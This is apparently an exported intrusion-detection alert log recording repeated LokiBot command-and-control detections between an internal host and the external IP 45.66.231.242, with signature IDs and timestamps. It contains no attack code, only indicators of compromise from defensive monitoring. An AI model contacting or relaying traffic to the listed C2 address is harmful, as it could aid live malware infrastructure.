2024-10-01T10:56:12.182284+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.911144+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.813722+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.707475+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.758460+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.789425+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.729047+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.932407+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.914707+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.790640+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.717307+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.548372+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.403711+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.360698+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.244487+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:33.078751+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:34.264055+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:35.118822+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:36.007121+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:37.076989+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.993838+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.817577+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.675484+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.543640+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.469900+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.355681+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.346923+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.250217+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:45.124436+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49826	45.66.231.242	80	TCP
2024-10-01T10:56:46.001925+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49827	45.66.231.242	80	TCP
2024-10-01T10:56:46.932311+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49828	45.66.231.242	80	TCP
2024-10-01T10:56:47.715173+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49829	45.66.231.242	80	TCP
2024-10-01T10:56:48.656357+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49830	45.66.231.242	80	TCP
2024-10-01T10:56:49.497277+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49831	45.66.231.242	80	TCP
2024-10-01T10:56:50.315483+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49832	45.66.231.242	80	TCP
2024-10-01T10:56:51.139744+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49833	45.66.231.242	80	TCP
2024-10-01T10:56:52.030835+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49834	45.66.231.242	80	TCP
2024-10-01T10:56:52.933070+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49835	45.66.231.242	80	TCP
2024-10-01T10:56:53.939406+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49836	45.66.231.242	80	TCP
2024-10-01T10:56:54.751235+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49837	45.66.231.242	80	TCP
2024-10-01T10:56:55.562073+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49838	45.66.231.242	80	TCP
2024-10-01T10:56:56.353977+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49839	45.66.231.242	80	TCP
2024-10-01T10:56:57.296632+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49840	45.66.231.242	80	TCP
2024-10-01T10:56:58.123183+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49841	45.66.231.242	80	TCP
2024-10-01T10:56:59.239027+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49842	45.66.231.242	80	TCP
2024-10-01T10:57:00.235929+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49843	45.66.231.242	80	TCP
2024-10-01T10:57:01.169312+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49844	45.66.231.242	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:54:58.990484+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49797	TCP
2024-10-01T10:55:01.758214+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49732	TCP
2024-10-01T10:55:02.671005+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49733	TCP
2024-10-01T10:55:03.560722+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49734	TCP
2024-10-01T10:55:04.625681+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49735	TCP
2024-10-01T10:55:05.545578+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49736	TCP
2024-10-01T10:55:06.538355+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49737	TCP
2024-10-01T10:55:10.382539+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49738	TCP
2024-10-01T10:55:11.263234+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49739	TCP
2024-10-01T10:55:12.109161+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49740	TCP
2024-10-01T10:55:13.003680+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49741	TCP
2024-10-01T10:55:13.909463+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49742	TCP
2024-10-01T10:55:14.902772+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49744	TCP
2024-10-01T10:55:15.845470+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49747	TCP
2024-10-01T10:55:16.904506+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49749	TCP
2024-10-01T10:55:20.766594+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49752	TCP
2024-10-01T10:55:21.659847+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49753	TCP
2024-10-01T10:55:22.554283+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49754	TCP
2024-10-01T10:55:23.475666+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49755	TCP
2024-10-01T10:55:24.556972+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49756	TCP
2024-10-01T10:55:25.379994+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49757	TCP
2024-10-01T10:55:26.200291+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49758	TCP
2024-10-01T10:55:27.090660+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49759	TCP
2024-10-01T10:55:27.956334+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49760	TCP
2024-10-01T10:55:28.844483+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49761	TCP
2024-10-01T10:55:29.666645+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49762	TCP
2024-10-01T10:55:30.563306+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49763	TCP
2024-10-01T10:55:31.399345+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49764	TCP
2024-10-01T10:55:32.198987+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49765	TCP
2024-10-01T10:55:33.049597+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49766	TCP
2024-10-01T10:55:33.954180+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49767	TCP
2024-10-01T10:55:34.781785+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49768	TCP
2024-10-01T10:55:35.689906+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49769	TCP
2024-10-01T10:55:36.541214+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49770	TCP
2024-10-01T10:55:37.355853+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49771	TCP
2024-10-01T10:55:38.221829+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49772	TCP
2024-10-01T10:55:39.225109+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49773	TCP
2024-10-01T10:55:40.160479+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49774	TCP
2024-10-01T10:55:41.026897+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49775	TCP
2024-10-01T10:55:42.246152+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49776	TCP
2024-10-01T10:55:43.429625+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49777	TCP
2024-10-01T10:55:47.277080+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49778	TCP
2024-10-01T10:55:48.117744+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49779	TCP
2024-10-01T10:55:48.973432+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49780	TCP
2024-10-01T10:55:50.181516+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49781	TCP
2024-10-01T10:55:50.995191+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49782	TCP
2024-10-01T10:55:51.902879+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49783	TCP
2024-10-01T10:55:53.039442+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49784	TCP
2024-10-01T10:55:53.838641+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49786	TCP
2024-10-01T10:55:54.643998+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49787	TCP
2024-10-01T10:55:55.647797+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49788	TCP
2024-10-01T10:55:56.443702+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49789	TCP
2024-10-01T10:55:57.293823+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49790	TCP
2024-10-01T10:55:58.598040+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49791	TCP
2024-10-01T10:55:59.522201+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49792	TCP
2024-10-01T10:56:00.363531+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49793	TCP
2024-10-01T10:56:10.265824+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49794	TCP
2024-10-01T10:56:11.184005+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49795	TCP
2024-10-01T10:56:12.009437+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49796	TCP
2024-10-01T10:56:13.740120+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49798	TCP
2024-10-01T10:56:14.668285+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49799	TCP
2024-10-01T10:56:15.557520+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49800	TCP
2024-10-01T10:56:16.590966+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49801	TCP
2024-10-01T10:56:17.501549+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49802	TCP
2024-10-01T10:56:21.575286+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49803	TCP
2024-10-01T10:56:22.790596+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49804	TCP
2024-10-01T10:56:23.762391+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49805	TCP
2024-10-01T10:56:27.648158+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49806	TCP
2024-10-01T10:56:28.566911+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49807	TCP
2024-10-01T10:56:29.402143+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49808	TCP
2024-10-01T10:56:30.243287+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49809	TCP
2024-10-01T10:56:31.101297+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49810	TCP
2024-10-01T10:56:32.079313+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49811	TCP
2024-10-01T10:56:32.922481+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49812	TCP
2024-10-01T10:56:33.845002+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49813	TCP
2024-10-01T10:56:34.959453+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49814	TCP
2024-10-01T10:56:35.853992+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49815	TCP
2024-10-01T10:56:36.903028+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49816	TCP
2024-10-01T10:56:37.832349+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49817	TCP
2024-10-01T10:56:38.662708+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49818	TCP
2024-10-01T10:56:39.508520+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49819	TCP
2024-10-01T10:56:40.385790+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49820	TCP
2024-10-01T10:56:41.315506+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49821	TCP
2024-10-01T10:56:42.201279+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49822	TCP
2024-10-01T10:56:43.193663+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49823	TCP
2024-10-01T10:56:44.092775+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49824	TCP
2024-10-01T10:56:44.968018+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49825	TCP
2024-10-01T10:56:45.848547+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49826	TCP
2024-10-01T10:56:46.772733+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49827	TCP
2024-10-01T10:56:47.572926+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49828	TCP
2024-10-01T10:56:48.479548+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49829	TCP
2024-10-01T10:56:49.343834+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49830	TCP
2024-10-01T10:56:50.158654+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49831	TCP
2024-10-01T10:56:50.989482+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49832	TCP
2024-10-01T10:56:51.885896+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49833	TCP
2024-10-01T10:56:52.789437+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49834	TCP
2024-10-01T10:56:53.777994+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49835	TCP
2024-10-01T10:56:54.603050+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49836	TCP
2024-10-01T10:56:55.414906+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49837	TCP
2024-10-01T10:56:56.211771+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49838	TCP
2024-10-01T10:56:57.145919+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49839	TCP
2024-10-01T10:56:57.976548+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49840	TCP
2024-10-01T10:56:58.809435+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49841	TCP
2024-10-01T10:57:00.079904+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49842	TCP
2024-10-01T10:57:01.018612+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49843	TCP
2024-10-01T10:57:01.965569+0200	2025483	1	A Network Trojan was detected	45.66.231.242	80	192.168.2.4	49844	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:55:01.753408+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:02.666163+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:03.554360+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:04.620841+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:05.540676+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:06.533521+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:10.377698+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:11.258339+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:12.104380+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.998782+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.904671+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:14.896174+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:15.839773+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:16.898883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:20.761788+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:21.655036+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:22.549440+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:23.470660+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:24.552098+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:25.375102+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:26.195469+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:27.085668+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.951507+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:28.839624+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:29.661872+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:30.557844+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:31.394167+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:32.194135+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:33.025064+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.949352+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:34.773757+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:35.685085+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:36.536343+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:37.350895+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:38.216992+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:39.220320+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:40.152556+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:41.022138+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:42.240978+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:43.424782+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:47.272279+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:48.112864+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.953210+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:50.176120+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.990247+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:51.898024+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:53.034432+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.833889+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:54.639139+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:55.642415+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:56.438948+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:57.289043+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:58.586844+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:59.517374+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:56:00.358622+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:10.260937+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:11.179166+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:12.004600+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.873678+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.732989+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:14.662421+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:15.549540+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:16.583958+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:17.494274+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:21.570507+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:22.785811+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:23.757565+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:27.643202+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:28.562142+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:29.397053+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:30.238349+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:31.057616+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:32.074355+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.917597+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:33.794817+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:34.954399+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:35.847108+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:36.897917+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:37.827181+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:38.657817+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:39.503641+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49819	45.66.231.242	80	TCP
